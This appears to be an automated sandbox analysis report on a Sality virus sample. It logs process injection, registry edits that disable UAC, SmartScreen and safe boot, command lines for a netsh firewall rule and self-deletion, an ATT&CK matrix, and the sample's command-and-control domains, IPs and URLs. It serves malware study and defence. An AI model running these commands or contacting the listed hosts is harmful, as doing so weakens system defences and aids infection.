        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: ED0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: EE0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 11E0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DA0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: DB0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1250000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1260000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BC0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: BD0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 1280000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 12D0000Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeMemory written: C:\Program Files (x86)\uLdivQBsLwUSVlcZPOLOuLprjkaOnOfJQnbtXTiUPajfmPSEWeyz\sedSmibSjDOiaD.exe base: 900000Jump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c ping 127.0.0.1 -n 3&del "C:\Users\user\Desktop\SECURI~1.EXE"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe "C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"Jump to behavior
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000000.1723698444.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2501792831.0000000003400000.00000004.00001000.00020000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000000.1723698444.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: dwm.exe, 00000006.00000000.1567670938.00000283DB78C000.00000004.00000020.00020000.00000000.sdmp, dwm.exe, 00000006.00000002.4039816798.00000283DB78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerS
        Source: dwm.exe, 00000006.00000000.1583110627.00000283DBDF1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000002.4049244093.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmp, sihost.exe, 00000013.00000000.1723698444.000001CF1D3D1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: jvauyc32.exe, 00000012.00000003.3680460042.0000000003194000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2472871899.0000000003424000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2217116667.0000000003D54000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Progmanq
        Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_0143E329 MultiByteToWideChar,RtlEnterCriticalSection,GetLocalTime,GetFileAttributesA,SetFileAttributesA,CreateFileA,GetFileSize,GetFileTime,CreateFileMappingA,MapViewOfFile,lstrcpyn,lstrcmpiA,GlobalAlloc,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,IsBadWritePtr,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,GetTickCount,GlobalAlloc,UnmapViewOfFile,CloseHandle,SetFilePointer,SetEndOfFile,WriteFile,GlobalFree,SetFileTime,CloseHandle,SetFileAttributesA,DeleteFileA,GlobalFree,RtlLeaveCriticalSection,Sleep,1_2_0143E329
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01443B60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,lstrcpy,lstrcat,RegOpenKeyExA,GetModuleFileNameA,wsprintfA,lstrlen,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,GetWindowsDirectoryA,lstrlen,lstrcat,GetComputerNameA,lstrlen,lstrlen,lstrcpy,GetUserNameA,lstrlen,lstrcpy,lstrlen,lstrlen,GetTempPathA,lstrlen,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrlen,lstrcat,CreateFileMappingA,lstrlen,GetTickCount,wsprintfA,lstrlen,wsprintfA,lstrcat,GetSystemDirectoryA,lstrlen,lstrcat,lstrcat,lstrcat,GlobalAlloc,GlobalAlloc,1_2_01443B60
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01441EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,1_2_01441EF6
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Changes security center settings (notifications, updates, antivirus, firewall)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
        Deletes keys which are related to windows safe boot (disables safe mode boot)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
        Disables UAC (registry)
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
        Disables the Smart Screen filter
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer SmartScreenEnabled OffJump to behavior
        Disables user account control notifications
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
        Modifies the windows firewall
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /a /c netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Modifies the windows firewall notifications settings
        Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileRegistry value created: DisableNotifications 1Jump to behavior
        Uses netsh to modify the Windows network and firewall settings
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="Z0BAZwxx" dir=in action=allow program="C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe"
        Source: jvauyc32.exe, 00000012.00000002.4048026026.00000000016CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
        Source: C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_014383C9 socket,htons,bind,listen,accept,CreateThread,closesocket,RtlExitUserThread,1_2_014383C9
        Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exeCode function: 1_2_01437A3A htons,socket,setsockopt,bind,GlobalAlloc,recvfrom,CreateThread,GlobalFree,closesocket,RtlExitUserThread,1_2_01437A3A

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire Infrastructure12
        Replication Through Removable Media        		1
        Windows Management Instrumentation        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		8
        Disable or Modify Tools        		1
        Credential API Hooking        		1
        System Time Discovery        		Remote Services1
        Archive Collected Data        		4
        Ingress Tool Transfer        		Exfiltration Over Other Network Medium1
        Inhibit System Recovery
        CredentialsDomainsDefault Accounts2
        Native API        		1
        Windows Service        		1
        DLL Side-Loading        		1
        Abuse Elevation Control Mechanism        		LSASS Memory11
        Peripheral Device Discovery        		Remote Desktop Protocol1
        Browser Session Hijacking        		2
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter        		1
        Registry Run Keys / Startup Folder        		1
        Bypass User Account Control        		2
        Obfuscated Files or Information        		Security Account Manager1
        Account Discovery        		SMB/Windows Admin Shares1
        Screen Capture        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        Access Token Manipulation        		3
        Software Packing        		NTDS3
        File and Directory Discovery        		Distributed Component Object Model1
        Credential API Hooking        		4
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
        Windows Service        		1
        DLL Side-Loading        		LSA Secrets16
        System Information Discovery        		SSHKeylogging14
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts612
        Process Injection        		1
        Bypass User Account Control        		Cached Domain Credentials1
        Query Registry        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
        Registry Run Keys / Startup Folder        		1
        File Deletion        		DCSync761
        Security Software Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
        Masquerading        		Proc Filesystem341
        Virtualization/Sandbox Evasion        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt341
        Virtualization/Sandbox Evasion        		/etc/passwd and /etc/shadow3
        Process Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
        Access Token Manipulation        		Network Sniffing1
        Application Window Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd612
        Process Injection        		Input Capture1
        System Owner/User Discovery        		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
        Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
        Hidden Files and Directories        		Keylogging1
        Remote System Discovery        		Taint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
        Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd TimersCommand ObfuscationGUI Input Capture1
        System Network Configuration Discovery        		Replication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536957 Sample: SecuriteInfo.com.Win32.Sect... Startdate: 18/10/2024 Architecture: WINDOWS Score: 100 60 padrup.com 2->60 62 onyx.deepdns.cryptostorm.net 2->62 64 11 other IPs or domains 2->64 94 Suricata IDS alerts for network traffic 2->94 96 Malicious sample detected (through community Yara rule) 2->96 98 Antivirus detection for dropped file 2->98 100 9 other signatures 2->100 9 SecuriteInfo.com.Win32.Sector.30.15961.3704.exe 501 15 2->9         started        signatures3 process4 dnsIp5 68 padrup.com 185.53.178.50, 49707, 49712, 49716 TEAMINTERNET-ASDE Germany 9->68 70 190.120.227.91, 49709, 49713, 49719 SARAONLINEINFORMATICAEIRELI-MEBR unknown 9->70 72 7 other IPs or domains 9->72 46 C:\voiv.exe, PE32 9->46 dropped 48 C:\Users\user\AppData\...\jvauyc32.exe, PE32 9->48 dropped 50 C:\Users\user\AppData\Local\...\winmxfy.exe, PE32 9->50 dropped 52 2 other malicious files 9->52 dropped 110 Query firmware table information (likely to detect VMs) 9->110 112 Creates autorun.inf (USB autostart) 9->112 114 Creates HTML files with .exe extension (expired dropper behavior) 9->114 116 14 other signatures 9->116 14 jvauyc32.exe 501 46 9->14         started        19 cmd.exe 1 9->19         started        21 fontdrvhost.exe 9->21 injected 23 2 other processes 9->23 file6 signatures7 process8 dnsIp9 74 n.ddnsgratis.com.br 14->74 76 113.21.72.31, 6832 WISHNET-AS-APWISHNETPRIVATELIMITEDIN India 14->76 78 89 other IPs or domains 14->78 54 C:\Users\user\AppData\Local\...\winkvnav.exe, PE32 14->54 dropped 56 C:\Users\user\AppData\Local\Temp\rckc.exe, PE32 14->56 dropped 58 C:\Program Files (x86)\...\msedge.exe, PE32+ 14->58 dropped 80 Multi AV Scanner detection for dropped file 14->80 82 Query firmware table information (likely to detect VMs) 14->82 84 Tries to detect sandboxes and other dynamic analysis tools (window names) 14->84 92 14 other signatures 14->92 25 explorer.exe 14->25 injected 27 sedSmibSjDOiaD.exe 14->27 injected 30 sedSmibSjDOiaD.exe 14->30 injected 36 23 other processes 14->36 86 Uses ping.exe to sleep 19->86 88 Uses ping.exe to check the status of other devices and networks 19->88 90 Uses netsh to modify the Windows network and firewall settings 19->90 32 conhost.exe 19->32         started        34 PING.EXE 1 19->34         started        file10 signatures11 process12 dnsIp13 39 jvauyc32.exe 25->39         started        118 Found direct / indirect Syscall (likely to bypass EDR) 27->118 66 n.ddnsgratis.com.br 194.5.152.215, 49733, 49867, 50031 DEDIPATH-LLCUS Germany 36->66 42 conhost.exe 36->42         started        44 netsh.exe 2 36->44         started        signatures14 process15 signatures16 102 Query firmware table information (likely to detect VMs) 39->102 104 Hides threads from debuggers 39->104 106 Tries to detect sandboxes / dynamic malware analysis system (registry check) 39->106 108 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 39->108

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe95%ReversingLabsWin32.Virus.Sality
        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe100%AviraW32/Sality.AT
        SecuriteInfo.com.Win32.Sector.30.15961.3704.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\winfpnht.exe100%AviraW32/Sality.AT
        C:\Users\user\AppData\Local\Temp\rckc.exe100%AviraW32/Sality.AT
        C:\Users\user\AppData\Local\Temp\winfpnht.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\rckc.exe100%Joe Sandbox ML
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe0%ReversingLabs
        C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe95%ReversingLabsWin32.Virus.Sality

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
        https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
        https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
        http://schemas.micro0%URL Reputationsafe
        https://reactjs.org/docs/error-decoder.html?invariant=0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ns1.random.dns.d0wn.biz
        		178.17.170.133
        		truefalse
          		unknown
          ns2.fr.dns.d0wn.biz
          		37.187.0.40
          		truefalse
            		unknown
            ist.fellig.org
            		178.63.145.236
            		truefalse
              		unknown
              ns2.random.dns.d0wn.biz
              		185.14.29.140
              		truefalse
                		unknown
                ns1.sg.dns.d0wn.biz
                		128.199.248.105
                		truefalse
                  		unknown
                  n.ddnsgratis.com.br
                  		194.5.152.215
                  		truetrue
                    		unknown
                    padrup.com
                    		185.53.178.50
                    		truetrue
                      		unknown
                      ns1.nl.dns.d0wn.biz
                      		95.85.9.86
                      		truefalse
                        		unknown
                        alors.deepdns.cryptostorm.net
                        		unknown
                        		unknowntrue
                          		unknown
                          civet.ziphaze.com
                          		unknown
                          		unknowntrue
                            		unknown
                            anyone.dnsrec.meo.ws
                            		unknown
                            		unknowntrue
                              		unknown
                              onyx.deepdns.cryptostorm.net
                              		unknown
                              		unknowntrue
                                		unknown
                                ns1.any.dns.d0wn.biz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  ns.dotbit.me
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://padrup.com/sobaka1.gif?28892810=465574000true
                                      		unknown
                                      http://padrup.com/sobaka1.gif?2e00e35c=-1979536876true
                                        		unknown
                                        http://190.120.227.91:8080/sobakavolos.gif?7d519a=82128900true
                                          		unknown
                                          http://190.120.227.91:8080/sobakavolos.gif?1847fe9d=-1443367349true
                                            		unknown
                                            http://padrup.com/sobaka1.gif?29d43e7c=701775484true
                                              		unknown
                                              http://190.120.227.91:8080/sobakavolos.gif?2c5425f=92964030true
                                                		unknown
                                                http://190.120.227.91:8080/sobakavolos.gif?328f1419=848237593true
                                                  		unknown
                                                  http://n.ddnsgratis.com.br/n/tasks.phptrue
                                                    		unknown
                                                    http://padrup.com/sobaka1.gif?2bc60f28=-2091766408true
                                                      		unknown
                                                      http://190.120.227.91:8080/sobakavolos.gif?25d5c2b0=-486371296true
                                                        		unknown
                                                        http://padrup.com/sobaka1.gif?311dbd80=1473261184true
                                                          		unknown
                                                          http://190.120.227.91:8080/sobakavolos.gif?253429ca=1872526686true
                                                            		unknown
                                                            http://190.120.227.91:8080/sobakavolos.gif?3337cce9=1720097375true
                                                              		unknown
                                                              http://190.120.227.91:8080/sobakavolos.gif?352e846=390355434true
                                                                		unknown
                                                                http://padrup.com/sobaka1.gif?1495f698=690744624true
                                                                  		unknown
                                                                  http://190.120.227.91:8080/sobakavolos.gif?4991659=617132744true
                                                                    		unknown
                                                                    http://padrup.com/sobaka1.gif?3269d32c=845796140true
                                                                      		unknown
                                                                      http://padrup.com/sobaka1.gif?1a078ca7=-1238050671true
                                                                        		unknown
                                                                        http://190.120.227.91:8080/sobakavolos.gif?18a856f=77566029true
                                                                          		unknown
                                                                          http://padrup.com/sobaka1.gif?18285ae2=405297890true
                                                                            		unknown
                                                                            http://190.120.227.91:8080/sobakavolos.gif?542972c=882501560true
                                                                              		unknown
                                                                              http://190.120.227.91:8080/sobakavolos.gif?12d42dc2=947685702true
                                                                                		unknown
                                                                                http://190.120.227.91:8080/sobakavolos.gif?308e5400=-443594752true
                                                                                  		unknown
                                                                                  http://190.120.227.91:8080/sobakavolos.gif?74d2bd=76561250true
                                                                                    		unknown
                                                                                    http://190.120.227.91:8080/sobakavolos.gif?2a895223=713642531true
                                                                                      		unknown
                                                                                      http://190.120.227.91:8080/sobakavolos.gif?2be56550=-1225394912true
                                                                                        		unknown
                                                                                        http://190.120.227.91:8080/sobakavolos.gif?140deb53=-1939771579true
                                                                                          		unknown
                                                                                          http://190.120.227.91:8080/sobakavolos.gif?121e2607=-1559275969true
                                                                                            		unknown

                                                                                            URLs from Memory and Binaries

                                                                                            NameSourceMaliciousAntivirus DetectionReputation
                                                                                            http://padrup.com/sobaka1.gif?18285ae2=405297890z#jvauyc32.exe, 0000000A.00000003.3254569338.000000000142C000.00000004.00000020.00020000.00000000.sdmp, jvauyc32.exe, 0000000A.00000002.4063142769.000000000142C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              https://api.msn.com:443/v1/news/Feed/Windows?jvauyc32.exe, 00000012.00000003.3692106800.00000000031CD000.00000004.00001000.00020000.00000000.sdmp, jvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1797327273.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3087282333.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              		unknown
                                                                                              http://padrup.com/sobaka1.gif?11fef99e=-1275740116cjvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://outlook.comxStartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  http://padrup.com/sobaka1.gif?11fef99e=-1275740116wjvauyc32.exe, 0000000A.00000003.3254569338.00000000013B8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    http://padrup.com/sobaka1.gif?2a61d79=222204765%jvauyc32.exe, 0000000A.00000003.2009490304.000000000143C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://api.msn.com/news/feed?ocid=winsearch&market=en-us&query=good%20news&apikey=uvobH5fEn1uz1xwZ5SearchApp.exe, 0000001E.00000000.2348124768.000001D62E157000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://padrup.com/sobaka1.gif?11fef99e=-1275740116ojvauyc32.exe, 0000000A.00000003.2407819962.0000000001446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://android.notify.windows.com/iOSpexplorer.exe, 00000017.00000000.1833219394.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.2136150315.000000000BE31000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocjvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-ojvauyc32.exe, 00000012.00000003.2505307561.0000000003DE5000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 00000017.00000003.3084745108.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000017.00000000.1799164284.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://api.msn.com/rTexplorer.exe, 00000017.00000000.1811548975.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://word.office.comsStartMenuExperienceHost.exe, 0000001C.00000000.1921378411.00000273D826E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
